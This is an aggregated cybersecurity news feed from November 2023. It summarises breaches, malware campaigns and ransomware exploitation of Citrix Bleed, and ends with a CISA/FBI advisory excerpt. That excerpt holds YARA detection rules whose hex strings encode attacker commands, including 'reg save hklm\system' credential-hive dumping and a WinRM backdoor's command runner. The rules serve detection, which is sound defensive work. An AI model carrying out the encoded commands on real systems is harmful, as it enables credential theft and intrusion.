            Autosummary: "Web shells allow attackers to run commands on servers to steal data or use the server as a launch pad for other activities like credential theft, lateral movement, deployment of additional payloads, or hands-on-keyboard activity, while allowing attackers to persist in an affected organization," Microsoft said back in 2021. "


            Automotive parts giant AutoZone disclosed data breach after MOVEit hack

            financial industry
            2023-11-23 https://securityaffairs.com/154633/data-breach/autozone-data-breach-after-moveit-hack.html
            American retailer and distributor of automotive parts and accessories AutoZone discloses a data breach after a MOVEit attack. AutoZone is an American retailer and distributor of automotive parts and accessories. The company is one of the largest aftermarket automotive parts and accessories retailers in the United States. AutoZone operates 7,140 stores across the United States, […] "

            Autosummary: Below is the list of organizations with the highest number of impacted individuals:

            Organization                                               Individuals
            Maximus                                                    11 million
            Pôle emploi                                                10 million
            Louisiana Office of Motor Vehicles                         6 million
            Colorado Department of Health Care Policy and Financing    4 million
            Oregon Department of Transportation                        3.5 million
            Teachers Insurance and Annuity Association of America      2.6 million
            Genworth                                                   2.5 million
            PH Tech                                                    1.7 million
            Milliman Solutions                                         1.2 million
            Wilton Reassurance Company                                 1.2 million

            “U.S.-based organizations account for 83.9 percent of known victims, Germany-based 3.6 percent, Canada-based 2.6 percent, and U.K.-based 2.1 percent.”


            Gunmen and sexism: On the road with Mexico’s women truckers

            latam
            2023-11-23 https://www.bbc.co.uk/news/world-latin-america-67421698?at_medium=RSS&at_campaign=KARANGA
            Less than 3% of global lorry drivers are women. In Mexico, some are challenging stereotypes behind the wheel. "



            Smashing Security podcast #349: Ransomware gang reports its own crime, and what happened at OpenAI?

            exploits ransomware
            2023-11-23 https://grahamcluley.com/smashing-security-podcast-349/
            Who gets to decide who should be CEO of OpenAI? ChatGPT or the board? Plus a ransomware gang goes a step further than most, reporting one of its own data breaches to the US Securities and Exchange Commission. All this and more is discussed in the latest edition of the "Smashing Security" podcast by cybersecurity veterans Graham Cluley and Carole Theriault. "

            Autosummary: Hosts: Graham Cluley – @gcluley Carole Theriault – @caroletheriault Episode links: Sponsored by: Kolide – Kolide ensures that if your device isn’t secure it can’t access your cloud apps. "


            Konni Group Using Russian-Language Malicious Word Docs in Latest Attacks

            rusia-ucrania
            2023-11-23 https://thehackernews.com/2023/11/konni-group-using-russian-language.html
            A new phishing attack has been observed leveraging a Russian-language Microsoft Word document to deliver malware capable of harvesting sensitive information from compromised Windows hosts. The activity has been attributed to a threat actor called Konni, which is assessed to share overlaps with a North Korean cluster tracked as Kimsuky (aka APT43). "This campaign relies on a remote access trojan "

            Autosummary: " The Visual Basic for Application (VBA) macro subsequently proceeds to launch an interim Batch script that performs system checks, User Account Control (UAC) bypass, and ultimately paves the way for the deployment of a DLL file that incorporates information gathering and exfiltration capabilities. "


            Alert: New WailingCrab Malware Loader Spreading via Shipping-Themed Emails

            exploits
            2023-11-23 https://thehackernews.com/2023/11/alert-new-wailingcrab-malware-loader.html
            Delivery- and shipping-themed email messages are being used to deliver a sophisticated malware loader known as WailingCrab. "The malware itself is split into multiple components, including a loader, injector, downloader and backdoor, and successful requests to C2-controlled servers are often necessary to retrieve the next stage," IBM X-Force researchers Charlotte Hammond, Ole Villadsen, and Kat "

            Autosummary: "The malware itself is split into multiple components, including a loader, injector, downloader and backdoor, and successful requests to C2-controlled servers are often necessary to retrieve the next stage," IBM X-Force researchers Charlotte Hammond, Ole Villadsen, and Kat Metrick said. "


            Mexico crime: Alleged security chief for El Chapo’s sons detained

            latam
            2023-11-23 https://www.bbc.co.uk/news/world-latin-america-67509688?at_medium=RSS&at_campaign=KARANGA
            Police say Néstor Isidro Pérez Salas provided protection for the leaders of a Sinaloa cartel faction. "



            Black Friday 2023: Get 25% off the Zero2Automated malware analysis course

            exploits
            2023-11-23 https://www.bleepingcomputer.com/news/security/black-friday-2023-get-25-percent-off-the-zero2automated-malware-analysis-course/
            The popular Zero2Automated malware analysis and reverse-engineering course has a Black Friday 2023 through Cyber Monday sale, where you can get 25% off sitewide, including gift certificates and courses. [...] "

            Autosummary: Cyber Monday you can enroll in any Zero2Automated course/bundle, for 25% off - this discount is store wide, so that includes our Ultimate Malware Reverse Engineering Bundle, consisting of the Beginner Malware Analysis Course, Zero2Hero, and Zero2Automated: "


            $19 Stanley cup deal is a Black Friday scam

            financial
            2023-11-23 https://www.malwarebytes.com/blog/news/2023/11/19-stanley-cup-deal-is-a-black-friday-scam
            What better way to kick off the holiday scamming season than by offering a Black Friday sale on one of the most popular products around: a Stanley cup. "

            Autosummary: We found an ad on Facebook offering a Stanley Quencher for the low price of $19: Facebook ad for Stanley Quenchers Normally these Stanley cups sell for $45 on Amazon. Facebook comments of people claiming they received the goods As always, use your best spidey senses to pick up on scams like these. "


            Welltok data breach impacted 8.5 million patients in the U.S.

            financial
            2023-11-23 https://securityaffairs.com/154663/data-breach/welltok-data-breach-11m-patients.html
            Healthcare services provider Welltok disclosed a data breach that impacted nearly 8.5 million patients in the U.S. Welltok is a company that specializes in health optimization solutions. It provides a platform that leverages data-driven insights to engage individuals in their health and well-being. The platform aims to personalize and optimize health programs for individuals, employers, […] "

            Autosummary: The group health plans of Stanford Health Care, of Stanford Health Care, Lucile Packard Children’s Hospital Stanford, Stanford Health Care Tri-Valley, Stanford Medicine Partners, and Packard Children’s Health Alliance The Guthrie Clinic In August, cybersecurity firm Emsisoft shared disconcerting details about the recent, massive hacking campaign conducted by the Cl0p ransomware group that targeted the MOVEit Transfer file transfer platform designed by Progress Software Corporation. "


            $9 million seized from “pig butchering” scammers who preyed on lonely hearts

            financial
            2023-11-23 https://www.tripwire.com/state-of-security/9-million-seized-pig-butchering-scammers-who-preyed-lonely-hearts
            US authorities have seized almost $9 million worth of cryptocurrency linked to a gang engaged in cryptocurrency investment fraud and romance scams. Read more in my article on the Tripwire State of Security blog. "



            Why boards must prioritize cybersecurity expertise

            ciber
            2023-11-22 https://www.helpnetsecurity.com/2023/11/22/board-members-cybersecurity-decisions-video/

            In this Help Net Security video, Graeme Payne, US Advisory Service Leader at Kudelski Security, discusses how, with the incredible number of complex threats facing modern businesses, board members must take an increased role in cybersecurity decisions – or face the consequences.

            The post Why boards must prioritize cybersecurity expertise appeared first on Help Net Security.



            Organizations rethink cybersecurity investments to meet NIS Directive requirements

            ciber
            2023-11-22 https://www.helpnetsecurity.com/2023/11/22/nis-directive-requirements-investments/

            Despite a 25% increase in the cost of major cyber incidents in 2022 compared to 2021, the new report on cybersecurity investment from ENISA reveals a slight increase of 0.4% of IT budget dedicated to cybersecurity by EU operators in scope of the NIS Directive. Organizations face information security recruitment challenges However, if organizations are inclined to allocate more budget to cybersecurity, 47% of the total of organizations surveyed do not plan to hire information … More

            The post Organizations rethink cybersecurity investments to meet NIS Directive requirements appeared first on Help Net Security.


            Autosummary: OES provide essential services in strategic sectors of energy (electricity, oil and gas), transport (air, rail, water and road), banking, financial market infrastructures, health, drinking water supply and distribution, and digital infrastructure (Internet exchange points, domain name system service providers, top-level domain name registries). Organizations face information security recruitment challenges However, if organizations are inclined to allocate more budget to cybersecurity, 47% of the total of organizations surveyed do not plan to hire information security Full Time Equivalents (FTEs) in the next two years. "


            LockBit Ransomware Exploiting Critical Citrix Bleed Vulnerability to Break In

            exploits ransomware
            2023-11-22 https://thehackernews.com/2023/11/lockbit-ransomware-exploiting-critical.html
            Multiple threat actors, including LockBit ransomware affiliates, are actively exploiting a recently disclosed critical security flaw in Citrix NetScaler application delivery control (ADC) and Gateway appliances to obtain initial access to target environments. The joint advisory comes from the U.S. Cybersecurity and Infrastructure Security Agency (CISA), Federal Bureau of Investigation (FBI), "



            CISA offers cybersecurity services to non-federal orgs in critical infrastructure sector

            ciber
            2023-11-22 https://www.helpnetsecurity.com/2023/11/22/critical-infrastructure-cybersecurity-services/

            The Cybersecurity and Infrastructure Security Agency (CISA) has announced a pilot program that aims to offer cybersecurity services to critical infrastructure entities as they have become a common target in cyberattacks. “In alignment with CISA’s ‘Target Rich, Resource Poor’ strategy, our teams are working with critical infrastructure entities in the healthcare, water, and K-12 education sectors in our first phase of deployment. This year, we plan to deliver services to up to 100 entities,” said … More

            The post CISA offers cybersecurity services to non-federal orgs in critical infrastructure sector appeared first on Help Net Security.



            Malwarebytes consumer product roundup: The latest

            exploits
            2023-11-22 https://www.malwarebytes.com/blog/personal/2023/11/malwarebytes-consumer-product-roundup-the-latest
            Here are the innovations we’ve made in our products recently. Are you making the most of them? "

            Autosummary: Browser Guard: Available for both Windows and Mac, Malwarebytes Browser Guard is our free browser extension for Chrome, Edge, Firefox, and Safari that blocks unwanted and unsafe content, giving users a safer and faster browsing experience. What you get with our apps: Android: Scan for viruses and malware, and detect ransomware, Android exploits, phishing scams, and even potentially unwanted apps. Read the 25 most popular websites vs Malwarebytes Browser Guard. Malwarebytes Identity Theft Protection: Newly released, Malwarebytes Identity Theft Protection scours the dark web for your personal information, prevents your social media account from being hacked, and even keeps an eye on your credit (US only) — and it’s all backed by up to $2 million in identity theft insurance.


            How LockBit used Citrix Bleed to breach Boeing and other targets

            ransomware
            2023-11-22 https://www.helpnetsecurity.com/2023/11/22/lockbit-citrix-bleed/

            CVE-2023-4966, aka “Citrix Bleed”, has been exploited by LockBit 3.0 affiliates to breach Boeing’s parts and distribution business, and “other trusted third parties have observed similar activity impacting their organization,” cybersecurity and law enforcement officials have confirmed on Tuesday. In a joint cybersecurity advisory, the Cybersecurity and Infrastructure Security Agency (CISA), the FBI and officials from the Australian Cyber Security Center (ACSC) have shared the tactics, techniques, and procedures and indicators of compromise (IoCs) shared … More

            The post How LockBit used Citrix Bleed to breach Boeing and other targets appeared first on Help Net Security.


            Autosummary: The advisory contains a slew of IoCs – IP addresses, domains, (PowerShell) scripts, tools, scheduled tasks, commands and filenames – that organizations can look for to discover whether they are among LockBit’s victims. "


            Chiselled Ubuntu closes prevailing container security gaps

            Linux
            2023-11-22 https://www.helpnetsecurity.com/2023/11/22/canonical-chiselled-ubuntu/

            Canonical announced chiselled Ubuntu containers which come with Canonical’s security maintenance and support commitment. Chiselled Ubuntu containers are ultra-small OCI images that deliver only the application and its runtime dependencies, and no other operating system-level packages, utilities, or libraries. This makes them lightweight to maintain and operate, secure, and efficient in resource utilisation. Canonical’s chiselled Ubuntu portfolio includes pre-built images for popular toolchains like Java, .NET and Python. The company has been working closely with … More

            The post Chiselled Ubuntu closes prevailing container security gaps appeared first on Help Net Security.


            Autosummary: Key benefits include:
            - Bug-for-bug compatibility of containers and their contents from developer experience through DevOps and DevSecOps to production, as all the containers are built from the same package contents
            - Smaller containers mean fewer dependency headaches across the container CI lifecycle
            - Chisel CLI for an easy, Ubuntu-like experience as customers build or extend chiselled containers themselves using the same tools as Canonical
            - Simple images mean simpler image rebuilds
            - Reliable support and release cadence: chiselled Ubuntu images inherit Ubuntu’s long-term support guarantees and are updated within the same release cycle using the self-same packages as other LTS components
            Trusted provenance, optimal developer experience: According to GitLab’s 2022 Global DevSecOps Survey, only 64% of security professionals had a security plan for containers, and many DevOps teams don’t have a plan in place for other cutting-edge software technologies, including cloud-native/serverless, APIs, and microservices.


            Microsoft announces Defender bug bounty program

            exploits
            2023-11-22 https://www.helpnetsecurity.com/2023/11/22/microsoft-defender-bug-bounty/

            Microsoft has announced a new bug bounty program aimed at unearthing vulnerabilities in Defender-related products and services, and is offering participants the possibility to earn up to $20,000 for the most critical bugs. The Microsoft Defender bug bounty program Microsoft Defender includes various products and services that are built to secure and protect Microsoft users. “The [Microsoft Defender Bounty Program] will begin with a limited scope, focusing on Microsoft Defender for Endpoint APIs, and will … More

            The post Microsoft announces Defender bug bounty program appeared first on Help Net Security.



            North Korean Hackers Pose as Job Recruiters and Seekers in Malware Campaigns

            exploits
            2023-11-22 https://thehackernews.com/2023/11/north-korean-hackers-pose-as-job.html
            North Korean threat actors have been linked to two campaigns in which they masquerade as both job recruiters and seekers to distribute malware and obtain unauthorized employment with organizations based in the U.S. and other parts of the world. The activity clusters have been codenamed Contagious Interview and Wagemole, respectively, by Palo Alto Networks Unit 42. While the first set of attacks "

            Autosummary: BeaverTail, the JavaScript implant, is a stealer and a loader that comes with capabilities to steal sensitive information from web browsers and crypto wallets, and deliver additional payloads, including InvisibleFerret, a Python-based backdoor with fingerprinting, remote control, keylogging, and data exfiltration features. "


            CISA adds Looney Tunables Linux bug to its Known Exploited Vulnerabilities catalog

            exploits Linux
            2023-11-22 https://securityaffairs.com/154573/security/cisa-known-exploited-vulnerabilities-catalog-looney-tunables.html
            US CISA adds Looney Tunables Linux flaw to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added Looney Tunables Linux vulnerability to its Known Exploited Vulnerabilities (KEV) catalog. The vulnerability CVE-2023-4911 (CVSS score 7.8), aka Looney Tunables, is a buffer overflow issue that resides in the GNU C Library’s dynamic loader ld.so while processing the […] "

            Autosummary: “We have successfully identified and exploited this vulnerability (a local privilege escalation that grants full root privileges) on the default installations of Fedora 37 and 38, Ubuntu 22.04 and 23.04, and Debian 12 and 13.” reads the post published by Qualys. "


            New botnet malware exploits two zero-days to infect NVRs and routers

            exploits
            2023-11-22 https://www.bleepingcomputer.com/news/security/new-botnet-malware-exploits-two-zero-days-to-infect-nvrs-and-routers/
            A new Mirai-based malware botnet named "InfectedSlurs" has been exploiting two zero-day remote code execution (RCE) vulnerabilities to infect routers and video recorder (NVR) devices. [...] "

            Autosummary: InfectedSlurs operator challenging others to a "bin battle" (Akamai). The user also posted screenshots showing nearly ten thousand bots in the Telnet protocol and another 12,000 on specific device types/brands referred to as "Vacron," "ntel," and "UTT-Bots."


            Kansas courts confirm data theft, ransom demand after cyberattack

            ciber
            2023-11-22 https://www.bleepingcomputer.com/news/security/kansas-courts-confirm-data-theft-ransom-demand-after-cyberattack/
            The Kansas Judicial Branch has published an update on a cybersecurity incident it suffered last month, confirming that hackers stole sensitive files containing confidential information from its systems. [...] "

            Autosummary: In mid-October 2023, the Kansas courts authority disclosed a "security incident" that impacted the availability of multiple systems, including the eFiling system attorneys use for document submission, electronic payment systems, and the case management systems used by district and appellate courts.


            Welltok data breach exposes data of 8.5 million US patients

            financial
            2023-11-22 https://www.bleepingcomputer.com/news/security/welltok-data-breach-exposes-data-of-85-million-us-patients/
            Healthcare SaaS provider Welltok is warning that a data breach exposed the personal data of nearly 8.5 million patients in the U.S. after a file transfer program used by the company was hacked in a data theft attack. [...] "



            New InfectedSlurs Mirai-based botnet exploits two zero-days

            exploits
            2023-11-22 https://securityaffairs.com/154607/malware/infectedslurs-botnet.html
            Mirai-based botnet InfectedSlurs has been spotted exploiting two zero-day RCE flaws to compromise routers and video recorder (NVR) devices. Akamai discovered a new Mirai-based DDoS botnet, named InfectedSlurs, actively exploiting two zero-day vulnerabilities to infect routers and video recorder (NVR) devices. The researchers discovered the botnet in October 2023, but they believe it has been […] "

            Autosummary: Pierluigi Paganini, November 22, 2023.


            Brazil records its hottest ever temperature

            latam
            2023-11-21 https://www.bbc.co.uk/news/world-latin-america-67482423?at_medium=RSS&at_campaign=KARANGA
            The town of Araçuaí in the country’s southeast hit a high of 44.8C (112.6F) on Sunday.



            Kinsing Hackers Exploit Apache ActiveMQ Vulnerability to Deploy Linux Rootkits

            exploits Linux
            2023-11-21 https://thehackernews.com/2023/11/kinsing-hackers-exploit-apache-activemq.html
            The Kinsing threat actors are actively exploiting a critical security flaw in vulnerable Apache ActiveMQ servers to infect Linux systems with cryptocurrency miners and rootkits. "Once Kinsing infects a system, it deploys a cryptocurrency mining script that exploits the host’s resources to mine cryptocurrencies like Bitcoin, resulting in significant damage to the infrastructure and a negative



            Malicious Apps Disguised as Banks and Government Agencies Targeting Indian Android Users

            financial government
            2023-11-21 https://thehackernews.com/2023/11/malicious-apps-disguised-as-banks-and.html
            Android smartphone users in India are the target of a new malware campaign that employs social engineering lures to install fraudulent apps that are capable of harvesting sensitive data. “Using social media platforms like WhatsApp and Telegram, attackers are sending messages designed to lure users into installing a malicious app on their mobile device by impersonating legitimate organizations, "

            Autosummary: "Using social media platforms like WhatsApp and Telegram, attackers are sending messages designed to lure users into installing a malicious app on their mobile device by impersonating legitimate organizations, such as banks, government services, and utilities," Microsoft threat intelligence researchers Abhishek Pustakala, Harshita Tripathi, and Shivang Desai said in a Monday analysis. "


            Mustang Panda Hackers Target Philippines Government Amid South China Sea Tensions

            government
            2023-11-21 https://thehackernews.com/2023/11/mustang-panda-hackers-targets.html
            The China-linked Mustang Panda actor has been linked to a cyber attack targeting a Philippines government entity amid rising tensions between the two countries over the disputed South China Sea. Palo Alto Networks Unit 42 attributed the adversarial collective to three campaigns in August 2023, primarily singling out organizations in the South Pacific. "The campaigns leveraged legitimate software "

            Autosummary: " Mustang Panda, also tracked under the names Bronze President, Camaro Dragon, Earth Preta, RedDelta, and Stately Taurus, is assessed to be a Chinese advanced persistent threat (APT) active since at least 2012, orchestrating cyber espionage campaigns targeting non-governmental organizations (NGOs) and government bodies across North America, Europe, and Asia. "


            Apache ActiveMQ bug exploited to deliver Kinsing malware

            exploits
            2023-11-21 https://www.helpnetsecurity.com/2023/11/21/apache-activemq-kinsing-malware/

            Attackers are exploiting a recently fixed vulnerability (CVE-2023-46604) in Apache ActiveMQ to install Kinsing malware and cryptocurrency miners on targeted Linux systems. CVE-2023-46604 exploitation Apache ActiveMQ is a popular Java-based open source message broker that allows communication between applications and services by translating messages exchanged via different protocols (OpenWire, STOMP, MQTT, AMQP, etc.). CVE-2023-46604 is a vulnerability in the Java OpenWire protocol marshaller and may allow attackers to execute arbitrary code with the same privileges … More

            The post Apache ActiveMQ bug exploited to deliver Kinsing malware appeared first on Help Net Security.



            Play Ransomware Goes Commercial - Now Offered as a Service to Cybercriminals

            exploits ransomware ciber
            2023-11-21 https://thehackernews.com/2023/11/play-ransomware-goes-commercial-now.html
            The ransomware strain known as Play is now being offered to other threat actors "as a service," new evidence unearthed by Adlumin has revealed. "The unusual lack of even small variations between attacks suggests that they are being carried out by affiliates who have purchased the ransomware-as-a-service (RaaS) and are following step-by-step instructions from playbooks delivered with it," the "



            New Agent Tesla Malware Variant Using ZPAQ Compression in Email Attacks

            exploits
            2023-11-21 https://thehackernews.com/2023/11/new-agent-tesla-malware-variant-using.html
            A new variant of the Agent Tesla malware has been observed delivered via a lure file with the ZPAQ compression format to harvest data from several email clients and nearly 40 web browsers. "ZPAQ is a file compression format that offers a better compression ratio and journaling function compared to widely used formats like ZIP and RAR," G Data malware analyst Anna Lvova said in a Monday analysis. "

            Autosummary: First appearing in 2014, Agent Tesla is a keylogger and remote access trojan (RAT) written in .NET that’s offered to other threat actors as part of a malware-as-a-service (MaaS) model.


            How Multi-Stage Phishing Attacks Exploit QRs, CAPTCHAs, and Steganography

            financial exploits
            2023-11-21 https://thehackernews.com/2023/11/how-multi-stage-phishing-attacks.html
            Phishing attacks are steadily becoming more sophisticated, with cybercriminals investing in new ways of deceiving victims into revealing sensitive information or installing malicious software. One of the latest trends in phishing is the use of QR codes, CAPTCHAs, and steganography. See how they are carried out and learn to detect them. Quishing Quishing, a phishing technique resulting from the "

            Autosummary: Quishing Quishing, a phishing technique resulting from the combination of "QR" and "phishing," has become a popular weapon for cybercriminals in 2023. An email containing a QR code with a malicious link Analyzing a QR code with an embedded malicious link in a safe environment is easy with ANY.RUN: Simply open this task in the sandbox (or upload your file with a QR code). "


            Experts warn of a surge in NetSupport RAT attacks against education and government sectors

            government
            2023-11-21 https://securityaffairs.com/154513/malware/surge-netsupport-rat-attacks.html
            Experts warn of a surge in NetSupport RAT attacks against education, government, and business services sectors. The Carbon Black Managed Detection & Response team is warning of a surge in the number of new infections related to NetSupport RAT in the last few weeks. The most impacted sectors are education, government, and business services. NetSupport […] "

            Autosummary: Pierluigi Paganini, November 21, 2023.


            Auto parts giant AutoZone warns of MOVEit data breach

            financial
            2023-11-21 https://www.bleepingcomputer.com/news/security/auto-parts-giant-autozone-warns-of-moveit-data-breach/
            AutoZone is warning tens of thousands of its customers that it suffered a data breach as part of the Clop MOVEit file transfer attacks. [...] "

            Autosummary: The data leaked by the cybercriminals is roughly 1.1GB in size, containing employee names, email addresses, parts supply details, tax information, payroll documents, Oracle database files, data about stores, production and sales information, and more. "


            CISA orders federal agencies to patch Looney Tunables Linux bug

            exploits Linux
            2023-11-21 https://www.bleepingcomputer.com/news/security/cisa-orders-federal-agencies-to-patch-looney-tunables-linux-bug/
            Today, CISA ordered U.S. federal agencies to secure their systems against an actively exploited vulnerability that lets attackers gain root privileges on many major Linux distributions. [...] "

            Autosummary: "With the capability to provide full root access on popular platforms like Fedora, Ubuntu, and Debian, it’s imperative for system administrators to act swiftly," Qualys’ Saeed Abbasi warned.


            DarkGate and Pikabot malware emerge as Qakbot’s successors

            exploits
            2023-11-21 https://www.bleepingcomputer.com/news/security/darkgate-and-pikabot-malware-emerge-as-qakbots-successors/
            A sophisticated phishing campaign pushing the DarkGate malware infections has recently added the PikaBot malware into the mix, making it the most advanced phishing campaign since the Qakbot operation was dismantled. [...] "

            Autosummary: It is an advanced modular malware that supports a variety of malicious behaviors, including hVNC for remote access, cryptocurrency mining, reverse shell, keylogging, clipboard stealing, and information stealing (files, browser data). "


            Black Friday deal: Get 50% off Malwarebytes Premium + Privacy VPN

            exploits
            2023-11-21 https://www.bleepingcomputer.com/news/security/black-friday-deal-get-50-percent-off-malwarebytes-premium-plus-privacy-vpn/
            Malwarebytes is running a Black Friday 2023 deal now through Cyber Monday, offering a 50% discount on the Malwarebytes Premium + Privacy VPN bundle until November 30th. [...] "

            Autosummary: "


            #StopRansomware: LockBit 3.0 Ransomware Affiliates Exploit CVE 2023-4966 Citrix Bleed Vulnerability

            exploits ransomware
            2023-11-21 https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-325a

            SUMMARY

            Note: This joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.

            The Cybersecurity and Infrastructure Security Agency (CISA), Federal Bureau of Investigation (FBI), Multi-State Information Sharing & Analysis Center (MS-ISAC), and Australian Signals Directorate’s Australian Cyber Security Center (ASD’s ACSC) are releasing this joint Cybersecurity Advisory (CSA) to disseminate IOCs, TTPs, and detection methods associated with LockBit 3.0 ransomware exploiting CVE-2023-4966, labeled Citrix Bleed, affecting Citrix NetScaler application delivery controller (ADC) and NetScaler Gateway appliances.

            This CSA provides TTPs and IOCs obtained from FBI, ACSC, and voluntarily shared by Boeing. Boeing observed LockBit 3.0 affiliates exploiting CVE-2023-4966, to obtain initial access to Boeing Distribution Inc., its parts and distribution business that maintains a separate environment. Other trusted third parties have observed similar activity impacting their organization.

            Historically, LockBit 3.0 affiliates have conducted attacks against organizations of varying sizes across multiple critical infrastructure sectors, including education, energy, financial services, food and agriculture, government and emergency services, healthcare, manufacturing, and transportation. The TTPs observed in LockBit ransomware attacks can vary significantly from one affiliate to another.

            Citrix Bleed, known to be leveraged by LockBit 3.0 affiliates, allows threat actors to bypass password requirements an "

            Autosummary: This critical vulnerability exploit impacts the following software versions [1]:

                NetScaler ADC and NetScaler Gateway 14.1 before 14.1-8.50
                NetScaler ADC and NetScaler Gateway 13.1 before 13.1-49.15
                NetScaler ADC and NetScaler Gateway 13.0 before 13.0-92.19
                NetScaler ADC and NetScaler Gateway version 12.1 (EOL)
                NetScaler ADC 13.1-FIPS before 13.1-37.163
                NetScaler ADC 12.1-FIPS before 12.1-55.300
                NetScaler ADC 12.1-NDcPP before 12.1-55.300

            Due to the ease of exploitation, CISA and the authoring organizations expect to see widespread exploitation of the Citrix vulnerability in unpatched software services throughout both private and public networks.

            This will aid the hunt for suspicious activity such as installing tools on the system (e.g., putty, rClone), new account creation, log item failure, or running commands such as hostname, quser, whoami, net, and taskkill.

            Rule for a.py:

                rule CISA_10478915_04 : backdoor communicates_with_c2 remote_access
                {
                    meta:
                        author = "CISA Code & Media Analysis"
                        incident = "10478915"
                        date = "2023-11-06"
                        last_modified = "20231108_1500"
                        actor = "n/a"
                        family = "n/a"
                        capabilities = "communicates-with-c2"
                        malware_type = "backdoor"
                        tool_type = "remote-access"
                        description = "Detects trojan python samples"
                        sha256 = "906602ea3c887af67bcb4531bbbb459d7c24a2efcb866bcb1e3b028a51f12ae6"
                    strings:
                        $s1 = { 70 6f 72 74 20 3d 20 34 34 33 20 69 66 20 22 68 74 74 70 73 22 }
                        $s2 = { 6b 77 61 72 67 73 2e 67 65 74 28 22 68 61 73 68 70 61 73 73 77 64 22 29 3a }
                        $s3 = { 77 69 6e 72 6d 2e 53 65 73 73 69 6f 6e 20 62 61 73 69 63 20 65 72 72 6f 72 }
                        $s4 = { 57 69 6e 64 77 6f 73 63 6d 64 2e 72 75 6e 5f 63 6d 64 28 73 74 72 28 63 6d 64 29 29 }
                    condition:
                        all of them
                }

            This file is a Python script called a.py that attempts to leverage WinRM to establish a session.

            Rule for a.exe (rule header truncated in the summary):

                    meta:
                        author = "CISA Code & Media Analysis"
                        incident = "10478915"
                        date = "2023-11-06"
                        last_modified = "20231108_1500"
                        actor = "n/a"
                        family = "n/a"
                        capabilities = "installs-other-components"
                        malware_type = "trojan"
                        tool_type = "unknown"
                        description = "Detects trojan PE32 samples"
                        sha256 = "e557e1440e394537cca71ed3d61372106c3c70eb6ef9f07521768f23a0974068"
                    strings:
                        $s1 = { 57 72 69 74 65 46 69 6c 65 }
                        $s2 = { 41 70 70 50 6f 6c 69 63 79 47 65 74 50 72 6f 63 65 73 73 54 65 72 6d 69 6e 61 74 69 6f 6e 4d 65 74 68 6f 64 }
                        $s3 = { 6f 70 65 72 61 74 6f 72 20 63 6f 5f 61 77 61 69 74 }
                        $s4 = { 43 6f 6d 70 6c 65 74 65 20 4f 62 6a 65 63 74 20 4c 6f 63 61 74 6f 72 }
                        $s5 = { 64 65 6c 65 74 65 5b 5d }
                        $s6 = { 4e 41 4e 28 49 4e 44 29 }
                    condition:
                        uint16(0) == 0x5a4d and pe.imphash() == "6e8ca501c45a9b85fff2378cffaa24b2" and pe.size_of_code == 84480 and all of them
                }

            This file is a 64-bit Windows command-line executable called a.exe that is executed by a.bat.

            Rule for a.dll (rule header and the end of the condition truncated in the summary):

                    meta:
                        author = "CISA Code & Media Analysis"
                        incident = "10478915"
                        date = "2023-11-06"
                        last_modified = "20231108_1500"
                        actor = "n/a"
                        family = "n/a"
                        capabilities = "steals-authentication-credentials"
                        malware_type = "trojan"
                        tool_type = "credential-exploitation"
                        description = "Detects trojan DLL samples"
                        sha256 = "17a27b1759f10d1f6f1f51a11c0efea550e2075c2c394259af4d3f855bbcc994"
                    strings:
                        $s1 = { 64 65 6c 65 74 65 }
                        $s2 = { 3c 2f 74 72 75 73 74 49 6e 66 6f 3e }
                        $s3 = { 42 61 73 65 20 43 6c 61 73 73 20 44 65 73 63 72 69 70 74 6f 72 20 61 74 20 28 }
                        $s4 = { 49 6e 69 74 69 61 6c 69 7a 65 43 72 69 74 69 63 61 6c 53 65 63 74 69 6f 6e 45 78 }
                        $s5 = { 46 69 6e 64 46 69 72 73 74 46 69 6c 65 45 78 57 }
                        $s6 = { 47 65 74 54 69 63 6b 43 6f 75 6e 74 }
                    condition:
                        uint16(0) == 0x5a4d and pe.subsystem == pe.

            Rule for a.bat (rule header truncated in the summary):

                    meta:
                        author = "CISA Code & Media Analysis"
                        incident = "10478915"
                        date = "2023-11-06"
                        last_modified = "20231108_1500"
                        actor = "n/a"
                        family = "n/a"
                        capabilities = "installs-other-components"
                        malware_type = "trojan"
                        tool_type = "information-gathering"
                        description = "Detects trojan .bat samples"
                        sha256 = "98e79f95cf8de8ace88bf223421db5dce303b112152d66ffdf27ebdfcdf967e9"
                    strings:
                        $s1 = { 63 3a 5c 77 69 6e 64 6f 77 73 5c 74 61 73 6b 73 5c 7a 2e 74 78 74 }
                        $s2 = { 72 65 67 20 73 61 76 65 20 68 6b 6c 6d 5c 73 79 73 74 65 6d 20 63 3a 5c 77 69 6e 64 6f 77 73 5c 74 61 73 6b 73 5c 65 6d }
                        $s3 = { 6d 61 6b 65 63 61 62 20 63 3a 5c 75 73 65 72 73 5c 70 75 62 6c 69 63 5c 61 2e 70 6e 67 20 63 3a 5c 77 69 6e 64 6f 77 73 5c 74 61 73 6b 73 5c 61 2e 63 61 62 }
                    condition:
                        all of them
                }

            This file is a Windows batch file called a.bat that is used to execute the file called a.exe with the file called a.dll as an argument.

            Open Source YARA Rule (truncated in the summary):

                import "pe"

                rule M_Hunting_Backdoor_FREEFIRE
                {
                    meta:
                        author = "Mandiant"
                        description = "This is a hunting rule to detect FREEFIRE samples using OP code sequences in getLastRecord method"
                        md5 = "eb842a9509dece779d138d2e6b0f6949"
                        malware_family = "FREEFIRE"
                    strings:
                        $s1 = { 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? ?? 7E ?? ?? ?? ?? ??

            Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by CISA and the authoring organizations.

            REFERENCES
            [1] NetScaler ADC and NetScaler Gateway Security Bulletin for CVE-2023-4966
            [2] Investigation of Session Hijacking via Citrix NetScaler ADC and Gateway Vulnerability (CVE-2023-4966)
            [3] What is Mshta, How Can it Be Used and How to Protect Against it (McAfee)

            VERSION HISTORY
            November 21, 2023: Initial version.

            REPORTING
            The FBI is seeking any information that can be shared, to include boundary logs showing communication to and from foreign IP addresses, a sample ransom note, communications with LockBit 3.0 affiliates, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file. "
